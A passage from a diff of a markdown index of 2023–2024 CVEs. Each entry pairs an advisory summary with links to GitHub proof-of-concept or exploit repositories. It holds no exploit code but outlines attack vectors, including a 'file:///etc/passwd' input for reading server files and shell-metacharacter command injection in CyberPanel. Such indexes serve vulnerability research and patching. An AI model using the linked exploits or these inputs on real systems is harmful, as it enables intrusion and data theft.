Site Scripting (XSS) vulnerability in the /BalloonSave.ashx endpoint, where it is possible to inject a malicious payload into the Content= field. + + +- [BrotherOfJhonny/CVE-2024-51026_Overview](https://github.com/BrotherOfJhonny/CVE-2024-51026_Overview) + +### CVE-2024-51030 (2024-11-08) + +A SQL injection vulnerability in manage_client.php and view_cab.php of Sourcecodester Cab Management System 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter, leading to unauthorized access and potential compromise of sensitive data within the database. + + +- [vighneshnair7/CVE-2024-51030](https://github.com/vighneshnair7/CVE-2024-51030) + +### CVE-2024-51031 (2024-11-08) + +A Cross-site Scripting (XSS) vulnerability in manage_account.php in Sourcecodester Cab Management System 1.0 allows remote authenticated users to inject arbitrary web scripts via the "First Name," "Middle Name," and "Last Name" fields. + + +- [vighneshnair7/CVE-2024-51031](https://github.com/vighneshnair7/CVE-2024-51031) + +### CVE-2024-51032 (2024-11-08) + +A Cross-site Scripting (XSS) vulnerability in manage_recipient.php of Sourcecodester Toll Tax Management System 1.0 allows remote authenticated users to inject arbitrary web scripts via the "owner" input field. + + +- [Shree-Chandragiri/CVE-2024-51032](https://github.com/Shree-Chandragiri/CVE-2024-51032) + +### CVE-2024-51132 (2024-11-05) + +An XML External Entity (XXE) vulnerability in HAPI FHIR before v6.4.0 allows attackers to access sensitive information or execute arbitrary code via supplying a crafted request containing malicious XML entities. + + +- [JAckLosingHeart/CVE-2024-51132-POC](https://github.com/JAckLosingHeart/CVE-2024-51132-POC) + +### CVE-2024-51179 (2024-11-12) + +An issue in Open 5GS v.2.7.1 allows a remote attacker to cause a denial of service via the Network Function Virtualizations (NFVs) such as the User Plane Function (UPF) and the Session Management Function (SMF), The Packet Data Unit (PDU) session establishment process. + + +- [Lakshmirnr/CVE-2024-51179](https://github.com/Lakshmirnr/CVE-2024-51179) + +### CVE-2024-51358 (2024-11-05) + +An issue in Linux Server Heimdall v.2.6.1 allows a remote attacker to execute arbitrary code via a crafted script to the Add new application. + + +- [Kov404/CVE-2024-51358](https://github.com/Kov404/CVE-2024-51358) + +### CVE-2024-51378 (2024-10-29) + +getresetstatus in dns/views.py and ftp/views.py in CyberPanel (aka Cyber Panel) before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands via /dns/getresetstatus or /ftp/getresetstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected. + + +- [refr4g/CVE-2024-51378](https://github.com/refr4g/CVE-2024-51378) +- [i0x29A/CVE-2024-51378](https://github.com/i0x29A/CVE-2024-51378) + +### CVE-2024-51430 (2024-10-31) + +Cross Site Scripting vulnerability in online diagnostic lab management system using php v.1.0 allows a remote attacker to execute arbitrary code via the Test Name parameter on the diagnostic/add-test.php component. + + +- [BLACK-SCORP10/CVE-2024-51430](https://github.com/BLACK-SCORP10/CVE-2024-51430) + +### CVE-2024-51435 +- [bevennyamande/CVE-2024-51435](https://github.com/bevennyamande/CVE-2024-51435) + +### CVE-2024-51442 +- [mselbrede/CVE-2024-51442](https://github.com/mselbrede/CVE-2024-51442) + +### CVE-2024-51567 (2024-10-29) + +upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected. + + +- [ajayalf/CVE-2024-51567](https://github.com/ajayalf/CVE-2024-51567) +- [thehash007/CVE-2024-51567-RCE-EXPLOIT](https://github.com/thehash007/CVE-2024-51567-RCE-EXPLOIT) +- [XiaomingX/cve-2024-51567-poc](https://github.com/XiaomingX/cve-2024-51567-poc) + +### CVE-2024-51665 (2024-11-04) + +Server-Side Request Forgery (SSRF) vulnerability in Noor alam Magical Addons For Elementor allows Server Side Request Forgery.This issue affects Magical Addons For Elementor: from n/a through 1.2.1. + + +- [RandomRobbieBF/CVE-2024-51665](https://github.com/RandomRobbieBF/CVE-2024-51665) + +### CVE-2024-51747 (2024-11-11) + +Kanboard is project management software that focuses on the Kanban methodology. An authenticated Kanboard admin can read and delete arbitrary files from the server. File attachments, that are viewable or downloadable in Kanboard are resolved through its `path` entry in the `project_has_files` SQLite db. Thus, an attacker who can upload a modified sqlite.db through the dedicated feature, can set arbitrary file links, by abusing path traversals. Once the modified db is uploaded and the project page is accessed, a file download can be triggered and all files, readable in the context of the Kanboard application permissions, can be downloaded. This issue has been addressed in version 1.2.42 and all users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [l20170217b/CVE-2024-51747](https://github.com/l20170217b/CVE-2024-51747) + +### CVE-2024-52002 (2024-11-08) + +Combodo iTop is a simple, web based IT Service Management tool. Several url endpoints are subject to a Cross-Site Request Forgery (CSRF) vulnerability. Please refer to the linked GHSA for the complete list. This issue has been addressed in version 3.2.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [Harshit-Mashru/iTop-CVEs-exploit](https://github.com/Harshit-Mashru/iTop-CVEs-exploit) + +### CVE-2024-52301 (2024-11-12) + +Laravel is a web application framework. When the register_argc_argv php directive is set to on , and users call any URL with a special crafted query string, they are able to change the environment used by the framework when handling the request. The vulnerability fixed in 6.20.45, 7.30.7, 8.83.28, 9.52.17, 10.48.23, and 11.31.0. The framework now ignores argv values for environment detection on non-cli SAPIs. + + +- [Nyamort/CVE-2024-52301](https://github.com/Nyamort/CVE-2024-52301) +- [martinhaunschmid/CVE-2024-52301-Research](https://github.com/martinhaunschmid/CVE-2024-52301-Research) +- [nanwinata/CVE-2024-52301](https://github.com/nanwinata/CVE-2024-52301) + +### CVE-2024-52302 (2024-11-14) + +common-user-management is a robust Spring Boot application featuring user management services designed to control user access dynamically. There is a critical security vulnerability in the application endpoint /api/v1/customer/profile-picture. This endpoint allows file uploads without proper validation or restrictions, enabling attackers to upload malicious files that can lead to Remote Code Execution (RCE). + + +- [d3sca/CVE-2024-52302](https://github.com/d3sca/CVE-2024-52302) + +### CVE-2024-52316 (2024-11-18) + +Unchecked Error Condition vulnerability in Apache Tomcat. If Tomcat is configured to use a custom Jakarta Authentication (formerly JASPIC) ServerAuthContext component which may throw an exception during the authentication process without explicitly setting an HTTP status to indicate failure, the authentication may not fail, allowing the user to bypass the authentication process. There are no known Jakarta Authentication components that behave in this way.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M26, from 10.1.0-M1 through 10.1.30, from 9.0.0-M1 through 9.0.95.\n\nUsers are recommended to upgrade to version 11.0.0, 10.1.31 or 9.0.96, which fix the issue. + + +- [TAM-K592/CVE-2024-52316](https://github.com/TAM-K592/CVE-2024-52316) + +### CVE-2024-52317 (2024-11-18) + +Incorrect object re-cycling and re-use vulnerability in Apache Tomcat. Incorrect recycling of the request and response used by HTTP/2 requests \ncould lead to request and/or response mix-up between users.\n\nThis issue affects Apache Tomcat: from 11.0.0-M23 through 11.0.0-M26, from 10.1.27 through 10.1.30, from 9.0.92 through 9.0.95.\n\nUsers are recommended to upgrade to version 11.0.0, 10.1.31 or 9.0.96, which fixes the issue. + + +- [TAM-K592/CVE-2024-52317](https://github.com/TAM-K592/CVE-2024-52317) + +### CVE-2024-52318 (2024-11-18) + +Incorrect object recycling and reuse vulnerability in Apache Tomcat.\n\nThis issue affects Apache Tomcat: 11.0.0, 10.1.31, 9.0.96.\n\nUsers are recommended to upgrade to version 11.0.1, 10.1.32 or 9.0.97, which fixes the issue. + + +- [TAM-K592/CVE-2024-52318](https://github.com/TAM-K592/CVE-2024-52318) + +### CVE-2024-52335 (2024-12-06) + +A vulnerability has been identified in syngo.plaza VB30E (All versions < VB30E_HF05). The affected application do not properly sanitize input data before sending it to the SQL server. This could allow an attacker with access to the application could use this vulnerability to execute malicious SQL commands to compromise the whole database. + + +- [cloudefence/CVE-2024-52335](https://github.com/cloudefence/CVE-2024-52335) + +### CVE-2024-52380 (2024-11-14) + +Unrestricted Upload of File with Dangerous Type vulnerability in Softpulse Infotech Picsmize allows Upload a Web Shell to a Web Server.This issue affects Picsmize: from n/a through 1.0.0. + + +- [RandomRobbieBF/CVE-2024-52380](https://github.com/RandomRobbieBF/CVE-2024-52380) +- [0xshoriful/CVE-2024-52380](https://github.com/0xshoriful/CVE-2024-52380) + +### CVE-2024-52382 (2024-11-14) + +Missing Authorization vulnerability in Medma Technologies Matix Popup Builder allows Privilege Escalation.This issue affects Matix Popup Builder: from n/a through 1.0.0. + + +- [RandomRobbieBF/CVE-2024-52382](https://github.com/RandomRobbieBF/CVE-2024-52382) + +### CVE-2024-52429 (2024-11-18) + +Unrestricted Upload of File with Dangerous Type vulnerability in Anton Hoelstad WP Quick Setup allows Upload a Web Shell to a Web Server.This issue affects WP Quick Setup: from n/a through 2.0. + + +- [RandomRobbieBF/CVE-2024-52429](https://github.com/RandomRobbieBF/CVE-2024-52429) + +### CVE-2024-52430 (2024-11-18) + +Deserialization of Untrusted Data vulnerability in Lis Lis Video Gallery allows Object Injection.This issue affects Lis Video Gallery: from n/a through 0.2.1. + + +- [RandomRobbieBF/CVE-2024-52430](https://github.com/RandomRobbieBF/CVE-2024-52430) + +### CVE-2024-52433 (2024-11-18) + +Deserialization of Untrusted Data vulnerability in Mindstien Technologies My Geo Posts Free allows Object Injection.This issue affects My Geo Posts Free: from n/a through 1.2. + + +- [RandomRobbieBF/CVE-2024-52433](https://github.com/RandomRobbieBF/CVE-2024-52433) + +### CVE-2024-52475 (2024-11-28) + +Authentication Bypass Using an Alternate Path or Channel vulnerability in Automation Web Platform Wawp allows Authentication Bypass.This issue affects Wawp: from n/a before 3.0.18. + + +- [ubaii/CVE-2024-52475](https://github.com/ubaii/CVE-2024-52475) + +### CVE-2024-52711 (2024-11-19) + +DI-8100 v16.07.26A1 is vulnerable to Buffer Overflow In the ip_position_asp function via the ip parameter. + + +- [14mb1v45h/cyberspace-CVE-2024-52711](https://github.com/14mb1v45h/cyberspace-CVE-2024-52711) + +### CVE-2024-52800 (2024-11-29) + +veraPDF is an open source PDF/A validation library. Executing policy checks using custom schematron files via the CLI invokes an XSL transformation that may theoretically lead to a remote code execution (RCE) vulnerability. This doesn't affect the standard validation and policy checks functionality, veraPDF's common use cases. Most veraPDF users don't insert any custom XSLT code into policy profiles, which are based on Schematron syntax rather than direct XSL transforms. For users who do, only load custom policy files from sources you trust. This issue has not yet been patched. Users are advised to be cautious of XSLT code until a patch is available. + + +- [JAckLosingHeart/GHSA-4cx5-89vm-833x-POC](https://github.com/JAckLosingHeart/GHSA-4cx5-89vm-833x-POC) + +### CVE-2024-52940 (2024-11-18) + +AnyDesk through 8.1.0 on Windows, when Allow Direct Connections is enabled, inadvertently exposes a public IP address within network traffic. The attacker must know the victim's AnyDesk ID. + + +- [ebrasha/abdal-anydesk-remote-ip-detector](https://github.com/ebrasha/abdal-anydesk-remote-ip-detector) +- [MKultra6969/AnySniff](https://github.com/MKultra6969/AnySniff) + +### CVE-2024-53255 (2024-11-25) + +BoidCMS is a free and open-source flat file CMS for building simple websites and blogs, developed using PHP and uses JSON as a database. In affected versions a reflected Cross-site Scripting (XSS) vulnerability exists in the /admin?page=media endpoint in the file parameter, allowing an attacker to inject arbitrary JavaScript code. This code could be used to steal the user's session cookie, perform phishing attacks, or deface the website. This issue has been addressed in version 2.1.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [0x4M3R/CVE-2024-53255](https://github.com/0x4M3R/CVE-2024-53255) + +### CVE-2024-53259 (2024-12-02) + +quic-go is an implementation of the QUIC protocol in Go. An off-path attacker can inject an ICMP Packet Too Large packet. Since affected quic-go versions used IP_PMTUDISC_DO, the kernel would then return a "message too large" error on sendmsg, i.e. when quic-go attempts to send a packet that exceeds the MTU claimed in that ICMP packet. By setting this value to smaller than 1200 bytes (the minimum MTU for QUIC), the attacker can disrupt a QUIC connection. Crucially, this can be done after completion of the handshake, thereby circumventing any TCP fallback that might be implemented on the application layer (for example, many browsers fall back to HTTP over TCP if they're unable to establish a QUIC connection). The attacker needs to at least know the client's IP and port tuple to mount an attack. This vulnerability is fixed in 0.48.2. + + +- [kota-yata/cve-2024-53259](https://github.com/kota-yata/cve-2024-53259) + +### CVE-2024-53345 (2025-01-07) + +An authenticated arbitrary file upload vulnerability in Car Rental Management System v1.0 to v1.3 allows attackers to execute arbitrary code via uploading a crafted file. + + +- [ShadowByte1/CVE-2024-53345](https://github.com/ShadowByte1/CVE-2024-53345) + +### CVE-2024-53375 (2024-12-02) + +An Authenticated Remote Code Execution (RCE) vulnerability affects the TP-Link Archer router series. A vulnerability exists in the "tmp_get_sites" function of the HomeShield functionality provided by TP-Link. This vulnerability is still exploitable without the activation of the HomeShield functionality. + + +- [ThottySploity/CVE-2024-53375](https://github.com/ThottySploity/CVE-2024-53375) + +### CVE-2024-53376 (2024-12-16) + +CyberPanel before 2.3.8 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the phpSelection field to the websites/submitWebsiteCreation URI. + + +- [ThottySploity/CVE-2024-53376](https://github.com/ThottySploity/CVE-2024-53376) + +### CVE-2024-53476 (2024-12-27) + +A race condition vulnerability in SimplCommerce at commit 230310c8d7a0408569b292c5a805c459d47a1d8f allows attackers to bypass inventory restrictions by simultaneously submitting purchase requests from multiple accounts for the same product. This can lead to overselling when stock is limited, as the system fails to accurately track inventory under high concurrency, resulting in potential loss and unfulfilled orders. + + +- [AbdullahAlmutawa/CVE-2024-53476](https://github.com/AbdullahAlmutawa/CVE-2024-53476) + +### CVE-2024-53522 (2025-01-07) + +Bangkok Medical Software HOSxP XE v4.64.11.3 was discovered to contain a hardcoded IDEA Key-IV pair in the HOSxPXE4.exe and HOS-WIN32.INI components. This allows attackers to access sensitive information. + + +- [Safecloudth/CVE-2024-53522](https://github.com/Safecloudth/CVE-2024-53522) + +### CVE-2024-53617 (2024-12-02) + +A Cross Site Scripting vulnerability in LibrePhotos before commit 32237 allows attackers to takeover any account via uploading an HTML file on behalf of the admin user using IDOR in file upload. + + +- [ii5mai1/CVE-2024-53617](https://github.com/ii5mai1/CVE-2024-53617) + +### CVE-2024-53677 (2024-12-11) + +File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.\n\nThis issue affects Apache Struts: from 2.0.0 before 6.4.0.\n\nUsers are recommended to upgrade to version 6.4.0 at least and migrate to the new file upload mechanism https://struts.apache.org/core-developers/file-upload . If you are not using an old file upload logic based on FileuploadInterceptor your application is safe.\n\nYou can find more details in  https://cwiki.apache.org/confluence/display/WW/S2-067 + + +- [cloudwafs/s2-067-CVE-2024-53677](https://github.com/cloudwafs/s2-067-CVE-2024-53677) +- [TAM-K592/CVE-2024-53677-S2-067](https://github.com/TAM-K592/CVE-2024-53677-S2-067) +- [yangyanglo/CVE-2024-53677](https://github.com/yangyanglo/CVE-2024-53677) +- [c4oocO/CVE-2024-53677-Docker](https://github.com/c4oocO/CVE-2024-53677-Docker) +- [XiaomingX/CVE-2024-53677-S2-067](https://github.com/XiaomingX/CVE-2024-53677-S2-067) +- [dustblessnotdust/CVE-2024-53677-S2-067-thread](https://github.com/dustblessnotdust/CVE-2024-53677-S2-067-thread) +- [0xdeviner/CVE-2024-53677](https://github.com/0xdeviner/CVE-2024-53677) +- [Q0LT/VM-CVE-2024-53677](https://github.com/Q0LT/VM-CVE-2024-53677) +- [EQSTLab/CVE-2024-53677](https://github.com/EQSTLab/CVE-2024-53677) +- [0xPThree/struts_cve-2024-53677](https://github.com/0xPThree/struts_cve-2024-53677) + +### CVE-2024-54152 (2024-12-10) + +Angular Expressions provides expressions for the Angular.JS web framework as a standalone module. Prior to version 1.4.3, an attacker can write a malicious expression that escapes the sandbox to execute arbitrary code on the system. With a more complex (undisclosed) payload, one can get full access to Arbitrary code execution on the system. The problem has been patched in version 1.4.3 of Angular Expressions. Two possible workarounds are available. One may either disable access to `__proto__` globally or make sure that one uses the function with just one argument. + + +- [math-x-io/CVE-2024-54152-poc](https://github.com/math-x-io/CVE-2024-54152-poc) + +### CVE-2024-54262 (2024-12-13) + +Unrestricted Upload of File with Dangerous Type vulnerability in Siddharth Nagar Import Export For WooCommerce allows Upload a Web Shell to a Web Server.This issue affects Import Export For WooCommerce: from n/a through 1.5. + + +- [RandomRobbieBF/CVE-2024-54262](https://github.com/RandomRobbieBF/CVE-2024-54262) + +### CVE-2024-54330 (2024-12-13) + +Server-Side Request Forgery (SSRF) vulnerability in Hep Hep Hurra (HHH) Hurrakify allows Server Side Request Forgery.This issue affects Hurrakify: from n/a through 2.4. + + +- [RandomRobbieBF/CVE-2024-54330](https://github.com/RandomRobbieBF/CVE-2024-54330) + +### CVE-2024-54363 (2024-12-16) + +Incorrect Privilege Assignment vulnerability in nssTheme Wp NssUser Register allows Privilege Escalation.This issue affects Wp NssUser Register: from n/a through 1.0.0. + + +- [RandomRobbieBF/CVE-2024-54363](https://github.com/RandomRobbieBF/CVE-2024-54363) + +### CVE-2024-54369 (2024-12-16) + +Missing Authorization vulnerability in ThemeHunk Zita Site Builder allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Zita Site Builder: from n/a through 1.0.2. + + +- [RandomRobbieBF/CVE-2024-54369](https://github.com/RandomRobbieBF/CVE-2024-54369) + +### CVE-2024-54374 (2024-12-16) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Sabri Taieb Sogrid allows PHP Local File Inclusion.This issue affects Sogrid: from n/a through 1.5.6. + + +- [RandomRobbieBF/CVE-2024-54374](https://github.com/RandomRobbieBF/CVE-2024-54374) + +### CVE-2024-54378 (2024-12-16) + +Missing Authorization vulnerability in Quietly Quietly Insights allows Privilege Escalation.This issue affects Quietly Insights: from n/a through 1.2.2. + + +- [RandomRobbieBF/CVE-2024-54378](https://github.com/RandomRobbieBF/CVE-2024-54378) + +### CVE-2024-54385 (2024-12-16) + +Server-Side Request Forgery (SSRF) vulnerability in SoftLab Radio Player allows Server Side Request Forgery.This issue affects Radio Player: from n/a through 2.0.82. + + +- [RandomRobbieBF/CVE-2024-54385](https://github.com/RandomRobbieBF/CVE-2024-54385) + +### CVE-2024-54679 (2024-12-05) + +CyberPanel (aka Cyber Panel) before 6778ad1 does not require the FilemanagerAdmin capability for restartMySQL actions. + + +- [hotplugin0x01/CVE-2024-54679](https://github.com/hotplugin0x01/CVE-2024-54679) + +### CVE-2024-54819 (2025-01-07) + +I, Librarian before and including 5.11.1 is vulnerable to Server-Side Request Forgery (SSRF) due to improper input validation in classes/security/validation.php + + +- [partywavesec/CVE-2024-54819](https://github.com/partywavesec/CVE-2024-54819) + +### CVE-2024-54910 +- [KrakenEU/CVE-2024-54910](https://github.com/KrakenEU/CVE-2024-54910) + +### CVE-2024-55099 (2024-12-12) + +A SQL Injection vulnerability was found in /admin/index.php in phpgurukul Online Nurse Hiring System v1.0, which allows remote attackers to execute arbitrary SQL commands to get unauthorized database access via the username parameter. + + +- [ugurkarakoc1/CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability-](https://github.com/ugurkarakoc1/CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability-) + +### CVE-2024-55457 +- [h13nh04ng/CVE-2024-55457-PoC](https://github.com/h13nh04ng/CVE-2024-55457-PoC) + +### CVE-2024-55557 (2024-12-16) + +ui/pref/ProxyPrefView.java in weasis-core in Weasis 4.5.1 has a hardcoded key for symmetric encryption of proxy credentials. + + +- [partywavesec/CVE-2024-55557](https://github.com/partywavesec/CVE-2024-55557) + +### CVE-2024-55587 (2024-12-11) + +python-libarchive through 4.2.1 allows directory traversal (to create files) in extract in zip.py for ZipFile.extractall and ZipFile.extract. + + +- [CSIRTTrizna/CVE-2024-55587](https://github.com/CSIRTTrizna/CVE-2024-55587) + +### CVE-2024-55875 (2024-12-12) + +http4k is a functional toolkit for Kotlin HTTP applications. Prior to version 5.41.0.0, there is a potential XXE (XML External Entity Injection) vulnerability when http4k handling malicious XML contents within requests, which might allow attackers to read local sensitive information on server, trigger Server-side Request Forgery and even execute code under some circumstances. Version 5.41.0.0 contains a patch for the issue. + + +- [JAckLosingHeart/CVE-2024-55875](https://github.com/JAckLosingHeart/CVE-2024-55875) + +### CVE-2024-55968 +- [Wi1DN00B/CVE-2024-55968](https://github.com/Wi1DN00B/CVE-2024-55968) +- [null-event/CVE-2024-55968](https://github.com/null-event/CVE-2024-55968) + +### CVE-2024-55972 (2024-12-16) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Chris Carvache eTemplates allows SQL Injection.This issue affects eTemplates: from n/a through 0.2.1. + + +- [RandomRobbieBF/CVE-2024-55972](https://github.com/RandomRobbieBF/CVE-2024-55972) + +### CVE-2024-55976 (2024-12-16) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mike Leembruggen Critical Site Intel allows SQL Injection.This issue affects Critical Site Intel: from n/a through 1.0. + + +- [RandomRobbieBF/CVE-2024-55976](https://github.com/RandomRobbieBF/CVE-2024-55976) + +### CVE-2024-55978 (2024-12-16) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WalletStation.com Code Generator Pro allows SQL Injection.This issue affects Code Generator Pro: from n/a through 1.2. + + +- [RandomRobbieBF/CVE-2024-55978](https://github.com/RandomRobbieBF/CVE-2024-55978) + +### CVE-2024-55980 (2024-12-16) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Webriderz Wr Age Verification allows SQL Injection.This issue affects Wr Age Verification: from n/a through 2.0.0. + + +- [RandomRobbieBF/CVE-2024-55980](https://github.com/RandomRobbieBF/CVE-2024-55980) + +### CVE-2024-55981 (2024-12-16) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nabajit Roy Nabz Image Gallery allows SQL Injection.This issue affects Nabz Image Gallery: from n/a through v1.00. + + +- [RandomRobbieBF/CVE-2024-55981](https://github.com/RandomRobbieBF/CVE-2024-55981) + +### CVE-2024-55982 (2024-12-16) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in richteam Share Buttons – Social Media allows Blind SQL Injection.This issue affects Share Buttons – Social Media: from n/a through 1.0.2. + + +- [RandomRobbieBF/CVE-2024-55982](https://github.com/RandomRobbieBF/CVE-2024-55982) + +### CVE-2024-55988 (2024-12-16) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Amol Nirmala Waman Navayan CSV Export allows Blind SQL Injection.This issue affects Navayan CSV Export: from n/a through 1.0.9. + + +- [RandomRobbieBF/CVE-2024-55988](https://github.com/RandomRobbieBF/CVE-2024-55988) + +### CVE-2024-56115 (2024-12-18) + +A vulnerability in Amiro.CMS before 7.8.4 exists due to the failure to take measures to neutralize special elements. It allows remote attackers to conduct a Cross-Site Scripting (XSS) attack. + + +- [ComplianceControl/CVE-2024-56115](https://github.com/ComplianceControl/CVE-2024-56115) + +### CVE-2024-56116 (2024-12-18) + +A Cross-Site Request Forgery vulnerability in Amiro.CMS before 7.8.4 allows remote attackers to create an administrator account. + + +- [ComplianceControl/CVE-2024-56116](https://github.com/ComplianceControl/CVE-2024-56116) + +### CVE-2024-56145 (2024-12-18) + +Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Users of affected versions are affected by this vulnerability if their php.ini configuration has `register_argc_argv` enabled. For these users an unspecified remote code execution vector is present. Users are advised to update to version 3.9.14, 4.13.2, or 5.5.2. Users unable to upgrade should disable `register_argc_argv` to mitigate the issue. + + +- [Chocapikk/CVE-2024-56145](https://github.com/Chocapikk/CVE-2024-56145) +- [Sachinart/CVE-2024-56145-craftcms-rce](https://github.com/Sachinart/CVE-2024-56145-craftcms-rce) + +### CVE-2024-56331 (2024-12-20) + +Uptime Kuma is an open source, self-hosted monitoring tool. An **Improper URL Handling Vulnerability** allows an attacker to access sensitive local files on the server by exploiting the `file:///` protocol. This vulnerability is triggered via the **"real-browser"** request type, which takes a screenshot of the URL provided by the attacker. By supplying local file paths, such as `file:///etc/passwd`, an attacker can read sensitive data from the server. This vulnerability arises because the system does not properly validate or sanitize the user input for the URL field. Specifically: 1. The URL input (`<input data-v-5f5c86d7="" id="url" type="url" class="form-control" pattern="https?://.+" required="">`) allows users to input arbitrary file paths, including those using the `file:///` protocol, without server-side validation. 2. The server then uses the user-provided URL to make a request, passing it to a browser instance that performs the "real-browser" request, which takes a screenshot of the content at the given URL. If a local file path is entered (e.g., `file:///etc/passwd`), the browser fetches and captures the file’s content. Since the user input is not validated, an attacker can manipulate the URL to request local files (e.g., `file:///etc/passwd`), and the system will capture a screenshot of the file's content, potentially exposing sensitive data. Any **authenticated user** who can submit a URL in "real-browser" mode is at risk of exposing sensitive data through screenshots of these files. This issue has been addressed in version 1.23.16 and all users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [griisemine/CVE-2024-56331](https://github.com/griisemine/CVE-2024-56331) + +### CVE-2024-56431 (2024-12-25) + +oc_huff_tree_unpack in huffdec.c in libtheora in Theora through 1.0 7180717 has an invalid negative left shift. + + +- [UnionTech-Software/libtheora-CVE-2024-56431-PoC](https://github.com/UnionTech-Software/libtheora-CVE-2024-56431-PoC) + +### CVE-2024-56433 (2024-12-26) + +shadow-utils (aka shadow) 4.4 through 4.17.0 establishes a default /etc/subuid behavior (e.g., uid 100000 through 165535 for the first user account) that can realistically conflict with the uids of users defined on locally administered networks, potentially leading to account takeover, e.g., by leveraging newuidmap for access to an NFS home directory (or same-host resources in the case of remote logins by these local network users). NOTE: it may also be argued that system administrators should not have assigned uids, within local networks, that are within the range that can occur in /etc/subuid. + + +- [JonnyWhatshisface/CVE-2024-56433](https://github.com/JonnyWhatshisface/CVE-2024-56433) + +### CVE-2024-56512 (2024-12-28) + +Apache NiFi 1.10.0 through 2.0.0 are missing fine-grained authorization checking for Parameter Contexts, referenced Controller Services, and referenced Parameter Providers, when creating new Process Groups.\n\nCreating a new Process Group can include binding to a Parameter Context, but in cases where the Process Group did not reference any Parameter values, the framework did not check user authorization for the bound Parameter Context. Missing authorization for a bound Parameter Context enabled clients to download non-sensitive Parameter values after creating the Process Group.\n\nCreating a new Process Group can also include referencing existing Controller Services or Parameter Providers. The framework did not check user authorization for referenced Controller Services or Parameter Providers, enabling clients to create Process Groups and use these components that were otherwise unauthorized.\n\nThis vulnerability is limited in scope to authenticated users authorized to create Process Groups. The scope is further limited to deployments with component-based authorization policies. Upgrading to Apache NiFi 2.1.0 is the recommended mitigation, which includes authorization checking for Parameter and Controller Service references on Process Group creation. + + +- [absholi7ly/CVE-2024-56512-Apache-NiFi-Exploit](https://github.com/absholi7ly/CVE-2024-56512-Apache-NiFi-Exploit) + +### CVE-2024-1642470 +- [Symbolexe/CVE-2024-1642470](https://github.com/Symbolexe/CVE-2024-1642470) + ## 2023 +### CVE-2023-0045 (2023-04-25) + +The current implementation of the prctl syscall does not issue an IBPB immediately during the syscall. The ib_prctl_set  function updates the Thread Information Flags (TIFs) for the task and updates the SPEC_CTRL MSR on the function __speculation_ctrl_update, but the IBPB is only issued on the next schedule, when the TIF bits are checked. This leaves the victim vulnerable to values already injected on the BTB, prior to the prctl syscall.  The patch that added the support for the conditional mitigation via prctl (ib_prctl_set) dates back to the kernel 4.9.176.\n\nWe recommend upgrading past commit a664ec9158eeddd75121d39c9a0758016097fa96\n\n + + +- [ASkyeye/CVE-2023-0045](https://github.com/ASkyeye/CVE-2023-0045) +- [es0j/CVE-2023-0045](https://github.com/es0j/CVE-2023-0045) + +### CVE-2023-0099 (2023-02-13) + +The Simple URLs WordPress plugin before 115 does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + + +- [amirzargham/CVE-2023-0099-exploit](https://github.com/amirzargham/CVE-2023-0099-exploit) + +### CVE-2023-0156 (2023-04-10) + +The All-In-One Security (AIOS) WordPress plugin before 5.1.5 does not limit what log files to display in it's settings pages, allowing an authorized user (admin+) to view the contents of arbitrary files and list directories anywhere on the server (to which the web server has access). The plugin only displays the last 50 lines of the file. + + +- [b0marek/CVE-2023-0156](https://github.com/b0marek/CVE-2023-0156) + +### CVE-2023-0157 (2023-04-10) + +The All-In-One Security (AIOS) WordPress plugin before 5.1.5 does not escape the content of log files before outputting it to the plugin admin page, allowing an authorized user (admin+) to plant bogus log files containing malicious JavaScript code that will be executed in the context of any administrator visiting this page. + + +- [b0marek/CVE-2023-0157](https://github.com/b0marek/CVE-2023-0157) + +### CVE-2023-0159 (2023-02-13) + +The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains. + + +- [im-hanzou/EVCer](https://github.com/im-hanzou/EVCer) + +### CVE-2023-0179 (2023-03-27) + +A buffer overflow vulnerability was found in the Netfilter subsystem in the Linux Kernel. This issue could allow the leakage of both stack and heap addresses, and potentially allow Local Privilege Escalation to the root user via arbitrary code execution. + + +- [TurtleARM/CVE-2023-0179-PoC](https://github.com/TurtleARM/CVE-2023-0179-PoC) +- [H4K6/CVE-2023-0179-PoC](https://github.com/H4K6/CVE-2023-0179-PoC) + +### CVE-2023-0264 (2023-08-04) + +A flaw was found in Keycloaks OpenID Connect user authentication, which may incorrectly authenticate requests. An authenticated attacker who could obtain information from a user request within the same realm could use that data to impersonate the victim and generate new session tokens. This issue could impact confidentiality, integrity, and availability. + + +- 